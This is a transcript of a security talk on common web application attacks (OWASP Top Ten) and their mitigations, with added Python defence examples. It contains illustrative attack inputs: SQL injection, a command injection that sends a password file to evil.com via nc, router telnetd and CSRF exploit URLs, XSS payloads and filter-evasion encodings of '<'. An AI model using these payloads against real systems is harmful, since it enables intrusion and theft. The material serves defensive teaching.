Top Web Application Attacks and How to Prevent Them
Attacking Web Applications
Sasha Goldshtein
CTO, Sela Group
blog.sashag.net
@goldshtn
Sasha Goldshtein
@goldshtn
Every web developer must be aware of the most common web attacks, risks, and mitigations.
Don’t fly blind.
Typical Risks
§  Exposure of user information
-  Passwords, emails, identity theft
§  Direct financial gain
-  Credit card details
§  Creating a botnet
-  Using servers/user systems for malicious activity
§  Denial of service
§  Some serious damage™
-  Considering that more and more embedded systems serve stuff over HTTP
Are They Really After Me?
1.  They could be, if you’re important.
2.  They are after your users.
3.  They are after your servers.
4.  They found you randomly on the web.
OWASP Top Ten
1.  Injection
2.  Broken auth and session management
3.  Cross-site scripting
4.  Insecure direct object references
5.  Security misconfiguration
6.  Sensitive data exposure
7.  Missing function level access control
8.  Cross-site request forgery
9.  Using vulnerable components
10. Unvalidated redirects and forwards
SQL Injection
§  Suppose the user request parameter is …
  ' or '1'='1
§  Then the query we execute is …
  select * from users where (name='' or '1'='1') and (password='whatever')
  db.ExecuteReader("select * from users where (name='" + Request["user"] + "') and (password='" + Request["password"] + "')");
OS Command Injection
§  Suppose we’re too lazy to perform DNS lookup, so we resort to the following:
  system("nslookup " + Request["hostname"]);
§  Suppose the hostname parameter is …
  foo || cat /etc/password | nc evil.com
§  Then we end up sending the password file to evil.com!
§  Most recent noisy exploit 10/9/2013 in DLink DIR-505 router firmware:
  request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;
DEMO
SQL injection and OS command injection
Mitigating Injections
§  DO NOT trust user input
§  DO NOT run code provided by the user
§  DO NOT use blacklists for validation
§  DO use SQL query parameters (?, @param, :param)
§  DO use whitelists and regexes for validation
§  DO fuzz your code with invalid input
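The two injection slides and these rules, worked through in Python as an added example (not code from the deck): the concatenated login query next to its parameterized form, run against a constructed in-memory SQLite table, plus a hostname whitelist for the nslookup case. The user table, the hostname regex and the function names are this example's own.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user with a clear-text password, purely to keep
    the injection demo short (see the Password Storage slide for real storage)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (name text, password text)")
    db.execute("insert into users values ('dave', 'whatever')")
    return db


def login_concat(db: sqlite3.Connection, user: str, password: str) -> bool:
    """The vulnerable pattern from the SQL Injection slide: input pasted into SQL text."""
    query = ("select * from users where (name='" + user + "') "
             "and (password='" + password + "')")
    return db.execute(query).fetchone() is not None


def login_param(db: sqlite3.Connection, user: str, password: str) -> bool:
    """Same query with ? placeholders: values are bound as data, never parsed as SQL."""
    query = "select * from users where (name=?) and (password=?)"
    return db.execute(query, (user, password)).fetchone() is not None


# Whitelist for the OS Command Injection slide: DNS labels of letters, digits and
# hyphens joined by dots. Shell metacharacters (; | ` & space) can never match.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def is_valid_hostname(hostname: str) -> bool:
    return len(hostname) <= 253 and HOSTNAME_RE.match(hostname) is not None


def nslookup_argv(hostname: str) -> list:
    """Build the argv for nslookup; reject anything off the whitelist. Passing a list
    to subprocess.run() never starts /bin/sh, so even a hostname that slipped
    through could not begin a second command."""
    if not is_valid_hostname(hostname):
        raise ValueError("invalid hostname: %r" % hostname)
    return ["nslookup", hostname]


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"   # the parameter from the SQL Injection slide, in both fields
    print("concatenated SQL, injected login:", login_concat(db, payload, payload))   # True
    print("parameterized SQL, injected login:", login_param(db, payload, payload))   # False
    print("parameterized SQL, real login:", login_param(db, "dave", "whatever"))     # True
    print("hostname accepted:", is_valid_hostname("evil.com"))                       # True
    print("hostname accepted:",
          is_valid_hostname("foo || cat /etc/password | nc evil.com"))               # False
```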
Sessions and Cookies
§  Most web applications today store sensitive user data in cookies
§  At the very least, the session identifier is stored in a cookie
-  Cookies are tasty
§  Don’t store anything else in cookies and don’t trust them
-  What if the client sends you:
  Cookie: username=dave;permissions=admin
DEMO
Exploiting vulnerable session information
Sessions and URLs
•  DO NOT embed session id in URLs
•  DO NOT trust cookie contents
•  DO NOT trust URL query string contents
  http://example.com/delete_account.php?account_name=sasha
•  DO NOT use predictable session ids
  http://example.com/cart.php?sess=127
•  DO use a Secure, HttpOnly cookie for session id
•  DO use long, random session ids
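The session rules from the last two slides in code, as an added example rather than anything from the deck: the session id is long and random, it is the only thing the client holds, it travels in a Secure, HttpOnly cookie, and the username and permissions live on the server, so the forged `username=dave;permissions=admin` cookie from the earlier slide resolves to an anonymous session. The cookie name `sess` and the store layout are this example's assumptions.

```python
import secrets
from http.cookies import SimpleCookie

SESSION_COOKIE = "sess"
ANONYMOUS = {"username": None, "permissions": "none"}


class SessionStore:
    """In-memory session table: session id -> data that only the server may set."""

    def __init__(self):
        self._sessions = {}

    def create(self, username: str, permissions: str) -> str:
        # 32 bytes (256 bits) from the OS CSPRNG, URL-safe encoded: not guessable,
        # unlike the sess=127 counter on the slide.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"username": username, "permissions": permissions}
        return sid

    def set_cookie_header(self, sid: str) -> str:
        # Secure: sent over HTTPS only. HttpOnly: unreadable from page scripts, so an
        # XSS bug cannot simply lift it. SameSite=Lax also blunts CSRF for cross-site POSTs.
        return f"Set-Cookie: {SESSION_COOKIE}={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"

    def lookup(self, cookie_header: str) -> dict:
        """Resolve a request's Cookie header to server-side data; unknown ids are anonymous."""
        jar = SimpleCookie()
        jar.load(cookie_header)
        morsel = jar.get(SESSION_COOKIE)
        if morsel is None:
            return dict(ANONYMOUS)
        # Only the id is taken from the client; username and permissions come from the store.
        return self._sessions.get(morsel.value, dict(ANONYMOUS))


def effective_permissions(store: SessionStore, cookie_header: str) -> str:
    return store.lookup(cookie_header)["permissions"]


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("dave", "user")
    print(store.set_cookie_header(sid))
    # The forged cookie from the Sessions and Cookies slide: no session id, so anonymous.
    print(effective_permissions(store, "username=dave;permissions=admin"))            # none
    # A real session id with a forged permissions field: the field is simply ignored.
    print(effective_permissions(store, f"{SESSION_COOKIE}={sid};permissions=admin"))  # user
```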
HTTP and HTTPS
§  Surprisingly many web applications still use HTTP to transmit sensitive information
§  Your HTTP traffic is freely available to:
-  Your Starbucks barista
-  Your family members
-  Your ISP
-  Your boss
§  As a developer, you are responsible for your users’ sensitive information
DEMO
Manipulating HTTP traffic
You Have Been Pineappled
§  WiFi Pineapple is a mobile pentesting device
-  ARM SOC, RAM, internal storage, USB storage, WiFi, Ethernet, 3G modem support
§  Karma mode
-  Client probes: “Is this the KatieHomeWiFi?” “Is this the Starbucks WiFi?” “Is this the JFKAirportWiFi?”
-  Pineapple: “Sure”
DroidSheep and zANTI
Use HTTPS Correctly
§  DO NOT send sensitive information over HTTP
§  DO NOT display login pages over HTTP
§  DO NOT load HTTP frames/scripts/images in an otherwise HTTPS page
§  DO insist on pure HTTPS for sensitive pages
§  DO use Secure cookies for sensitive data (reminder)
And, as a user:
§  DO NOT connect to unsecured Wi-Fi networks (like “Free WiFi” or “Fluent”)
§  DO use a VPN in insecure environments
Storing Sensitive Information
§  DO NOT store anything you don’t have to store
-  Least responsibility principle
§  DO comply with regulation for secure storage
-  E.g. if you store credit card details, you’re in for some pain
DEMO
Rainbow tables and weak passwords
http://haveibeenpwned.com by Troy Hunt
“Password” unseated by “123456” on SplashData’s annual “Worst Passwords” list
1.  123456
2.  password
3.  12345678
4.  qwerty
5.  abc123
6.  123456789
7.  111111
8.  1234567
9.  iloveyou
10. adobe123
11. 123123
12. admin
13. 1234567890
14. letmein
15. photoshop
16. 1234
17. monkey
18. shadow
19. sunshine
20. 12345
21. password1
22. princess
23. azerty
24. trustno1
25. 000000
Password Storage
§  DO NOT store passwords in clear text
§  DO NOT store encrypted passwords
§  DO hash and salt passwords
§  DO reject weak passwords during signup
§  DO consider using OAuth
§  DISCUSS which hash function to use
-  Super-slow (bcrypt) – subject to DOS
-  Super-fast (MD5, SHA1) – subject to cracking
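The storage rules above, as an added example that is not from the deck: salted PBKDF2 hashing with constant-time verification, a signup check against the 25 SplashData entries from the previous slide, and, for contrast, the unsalted fast hash the slide warns about, where recovering a common password is a 25-entry table lookup (the "rainbow tables and weak passwords" demo in miniature). The storage format string, the round count and the minimum length are this example's choices.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# The 25 entries from the SplashData slide.
WORST_PASSWORDS = frozenset("""123456 password 12345678 qwerty abc123 123456789
111111 1234567 iloveyou adobe123 123123 admin 1234567890 letmein photoshop 1234
monkey shadow sunshine 12345 password1 princess azerty trustno1 000000""".split())

PBKDF2_ROUNDS = 100_000  # raise until one verify costs ~100 ms on your servers


def is_acceptable_password(pw: str) -> bool:
    """Signup check: at least 10 characters and not on the worst-passwords list."""
    return len(pw) >= 10 and pw.lower() not in WORST_PASSWORDS


def hash_password(pw: str) -> str:
    """Return 'pbkdf2_sha256$rounds$salt$hash' with a fresh 16-byte salt per password,
    so two users with the same password get different hashes and a precomputed
    table of hashes is useless."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(pw: str, stored: str) -> bool:
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), int(rounds))
    # Constant-time comparison: timing must not reveal how many bytes matched.
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def unsalted_md5(pw: str) -> str:
    """What NOT to do: the "super-fast" option from the slide, with no salt."""
    return hashlib.md5(pw.encode()).hexdigest()


def lookup_unsalted_md5(md5_hex: str) -> Optional[str]:
    """For an unsalted fast hash, recovering a common password is a table lookup,
    not a computation. The same lookup is useless against hash_password() output
    because every stored hash has its own salt and 100k rounds."""
    table = {unsalted_md5(p): p for p in WORST_PASSWORDS}
    return table.get(md5_hex)


if __name__ == "__main__":
    print(is_acceptable_password("123456"))                          # False
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored))   # True
    print(lookup_unsalted_md5(unsalted_md5("letmein")))              # letmein
```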
Cross-Site Scripting (XSS)
•  Injecting JavaScript into pages viewed by other users
– Cookie stealing, information disclosure
– DOM manipulation, tricking the user to like Facebook pages, phishing
– DDOS, bitcoin mining :)
•  Temporary XSS
  http://searchengine.com/?q=<script>alert(1);</script>
•  Persistent XSS
– You provide data to the server which is then permanently displayed when users visit
DEMO
Persistent and temporary XSS
Cross-Site Request Forgery (CSRF)
§  Use the fact that the user is already authenticated to a website to generate requests on his behalf
  <img src="http://forum.com/delete_profile.php?confirmed=True" />
§  Interesting variation: use CSRF to login into YouTube with the attacker’s credentials; then, Google history is stored into the attacker’s account
-  “I used to know what you watched on YouTube”
DEMO
Persistent and temporary XSS
70 Ways To Encode <
  <  %3C  &lt  &lt;  &LT  &LT;
  &#60  &#060  &#0060  &#00060  &#000060  &#0000060
  &#60;  &#060;  &#0060;  &#00060;  &#000060;  &#0000060;
  &#x3c  &#x03c  &#x003c  &#x0003c  &#x00003c  &#x000003c
  &#x3c;  &#x03c;  &#x003c;  &#x0003c;  &#x00003c;  &#x000003c;
  &#X3c  &#X03c  &#X003c  &#X0003c  &#X00003c  &#X000003c
  &#X3c;  &#X03c;  &#X003c;  &#X0003c;  &#X00003c;  &#X000003c;
  &#x3C  &#x03C  &#x003C  &#x0003C  &#x00003C  &#x000003C
  &#x3C;  &#x03C;  &#x003C;  &#x0003C;  &#x00003C;  &#x000003C;
  &#X3C  &#X03C  &#X003C  &#X0003C  &#X00003C  &#X000003C
  &#X3C;  &#X03C;  &#X003C;  &#X0003C;  &#X00003C;  &#X000003C;
  \x3c  \x3C  \u003c  \u003C
Mitigating XSS and CSRF
§  DO NOT trust user input (déjà vu?)
§  DO NOT allow GETs to modify state
§  DO NOT rely on blacklists
§  DO escape and sanitize HTML provided by the user
§  DO use whitelists or a non-HTML format like Markdown
§  DO generate anti-CSRF tokens and validate them
§  DO validate Referer headers
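The XSS and CSRF rules on this slide in code, as an added example and not the deck's own: the reflected `q=` parameter from the XSS slide is rendered with output escaping (next to a blacklist filter that a case change alone defeats), and the `delete_profile.php` request from the CSRF slide is only honoured as a POST carrying the session's anti-CSRF token from the site's own origin, with a Referer check. The `https://forum.com` origin, the form markup and the handler names are this example's assumptions.

```python
import hmac
import html
import secrets
from typing import Optional
from urllib.parse import unquote_plus, urlsplit

SITE_ORIGIN = "https://forum.com"   # the forum from the CSRF slide; HTTPS assumed


# --- XSS: escape on output, do not blacklist on input ---------------------------
def blacklist_filter(text: str) -> str:
    """What NOT to do: strip one spelling of one tag (a case variant alone slips past)."""
    return text.replace("<script>", "").replace("</script>", "")


def render_search_page(q_param: str) -> str:
    """Reflect the q= parameter from the XSS slide into HTML. The browser sent it
    percent-encoded; after decoding, html.escape turns < > & " ' into entities, so
    whatever encoding of < was used on the way in, the browser only ever sees text."""
    q = unquote_plus(q_param)
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


# --- CSRF: per-session token plus Referer check on state-changing POSTs ----------
def new_csrf_token(session: dict) -> str:
    """Store a fresh random token in the server-side session and return it for the form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def delete_profile_form(session: dict) -> str:
    return ('<form method="POST" action="/delete_profile.php">'
            f'<input type="hidden" name="csrf_token" value="{new_csrf_token(session)}">'
            '<button>Delete profile</button></form>')


def referer_ok(referer: Optional[str]) -> bool:
    """Strict reading of the slide's advice: a missing Referer counts as cross-site."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def handle_delete_profile(method: str, form: dict, headers: dict, session: dict) -> str:
    """Honour the request only for a POST from our origin carrying this session's token."""
    if method != "POST":
        return "405 GET must not modify state"   # the slide's <img src=...> is a GET
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 missing or wrong anti-CSRF token"
    if not referer_ok(headers.get("Referer")):
        return "403 cross-site request"
    session["profile_deleted"] = True
    return "200 profile deleted"


if __name__ == "__main__":
    print(render_search_page("%3Cscript%3Ealert(1);%3C/script%3E"))
    print(blacklist_filter("<ScRiPt>alert(1)</ScRiPt>"))   # unchanged: the filter missed it
    session = {}
    print(delete_profile_form(session))
    print(handle_delete_profile("GET", {"confirmed": "True"}, {}, session))
    print(handle_delete_profile("POST", {}, {"Referer": "https://evil.example/"}, session))
    print(handle_delete_profile("POST", {"csrf_token": session["csrf_token"]},
                                {"Referer": SITE_ORIGIN + "/profile"}, session))
```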
Admin Consoles
§  DO NOT leave admin consoles exposed to the Internet
§  DO NOT provide “extra helpful” troubleshooting info
§  DO restrict admin consoles to local network only
§  DO whitelist IP addresses if absolutely necessary
Some auth cookies… yum!
DEMO
Locating admin consoles through Google
DLink DIR-615 and DIR-300 Security Advisory
•  OS command injection
  http://<IP>/tools_vct.xgi?set/runtime/switch/getlinktype=1&set/runtime/diagnostic/pingIp=1.1.1.1`telnetd`&pingIP=1.1.1.1
•  CSRF to change admin password and enable remote administration (Internet-facing)
  http://<IP>/tools_admin.php?ACTION_POST=1&apply=Save+Settings&admin_name=admin&admin_password1=admin1&admin_password2=admin1&grap_auth_enable_h=0&rt_enable=on&rt_enable_h=1&rt_ipaddr=0.0.0.0&rt_port=8080
•  Information disclosure
  http://<IP>/DevInfo.txt
•  Insecure password storage
  $ cat var/etc/httpasswd
  admin:admin
Summary & Call To Action
§  Be aware of security risks and typical vulnerabilities
§  Ensure your developers get up to date security training
§  Learn how to use the mitigation and prevention tools in your Web framework
§  Review code for security, not just correctness
§  If your web app is secure, attackers will try other routes
Thank You!
Sasha Goldshtein
CTO, Sela Group
blog.sashag.net
@goldshtn

More Related Content

Similar to Top Web Application Attacks and How to Prevent Them

Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Hacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyHacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyMiguel Ibarra
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001Miguel Ibarra
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Securityeugenet
 
The Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityThe Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityJarrod Overson
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter AppsDamon Cortesi
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 

Similar to Top Web Application Attacks and How to Prevent Them (20)

Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get Stung
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security System
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
Hacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyHacknbeers sqli and cryptography
Hacknbeers sqli and cryptography
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Security
 
The Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityThe Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of Security
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 

More from Sasha Goldshtein

Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing LandscapeSasha Goldshtein
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerSasha Goldshtein
 
Staring into the eBPF Abyss
Staring into the eBPF AbyssStaring into the eBPF Abyss
Staring into the eBPF AbyssSasha Goldshtein
 
Visual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET FrameworkVisual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET FrameworkSasha Goldshtein
 
Swift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS XSwift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS XSasha Goldshtein
 
C# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with XamarinC# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with XamarinSasha Goldshtein
 
Modern Backends for Mobile Apps
Modern Backends for Mobile AppsModern Backends for Mobile Apps
Modern Backends for Mobile AppsSasha Goldshtein
 
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013Sasha Goldshtein
 
Mastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and ProductionMastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and ProductionSasha Goldshtein
 
Delivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in MinutesDelivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in MinutesSasha Goldshtein
 
Building Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET BackendBuilding Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET BackendSasha Goldshtein
 
Building iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile ServicesBuilding iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile ServicesSasha Goldshtein
 
Windows Azure Mobile Services
Windows Azure Mobile ServicesWindows Azure Mobile Services
Windows Azure Mobile ServicesSasha Goldshtein
 
First Steps in Android Development
First Steps in Android DevelopmentFirst Steps in Android Development
First Steps in Android DevelopmentSasha Goldshtein
 
First Steps in iOS Development
First Steps in iOS DevelopmentFirst Steps in iOS Development
First Steps in iOS DevelopmentSasha Goldshtein
 

More from Sasha Goldshtein (20)

Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing Landscape
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF Primer
 
Staring into the eBPF Abyss
Staring into the eBPF AbyssStaring into the eBPF Abyss
Staring into the eBPF Abyss
 
Visual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET FrameworkVisual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET Framework
 
Swift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS XSwift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS X
 
C# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with XamarinC# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with Xamarin
 
Modern Backends for Mobile Apps
Modern Backends for Mobile AppsModern Backends for Mobile Apps
Modern Backends for Mobile Apps
 
.NET Debugging Workshop
.NET Debugging Workshop.NET Debugging Workshop
.NET Debugging Workshop
 
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
 
Mastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and ProductionMastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and Production
 
Introduction to RavenDB
Introduction to RavenDBIntroduction to RavenDB
Introduction to RavenDB
 
State of the Platforms
State of the PlatformsState of the Platforms
State of the Platforms
 
Delivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in MinutesDelivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in Minutes
 
Building Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET BackendBuilding Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET Backend
 
Building iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile ServicesBuilding iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile Services
 
Task and Data Parallelism
Task and Data ParallelismTask and Data Parallelism
Task and Data Parallelism
 
What's New in C++ 11?
What's New in C++ 11?What's New in C++ 11?
What's New in C++ 11?
 
Windows Azure Mobile Services
Windows Azure Mobile ServicesWindows Azure Mobile Services
Windows Azure Mobile Services
 
First Steps in Android Development
First Steps in Android DevelopmentFirst Steps in Android Development
First Steps in Android Development
 
First Steps in iOS Development
First Steps in iOS DevelopmentFirst Steps in iOS Development
First Steps in iOS Development
 

Recently uploaded

Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
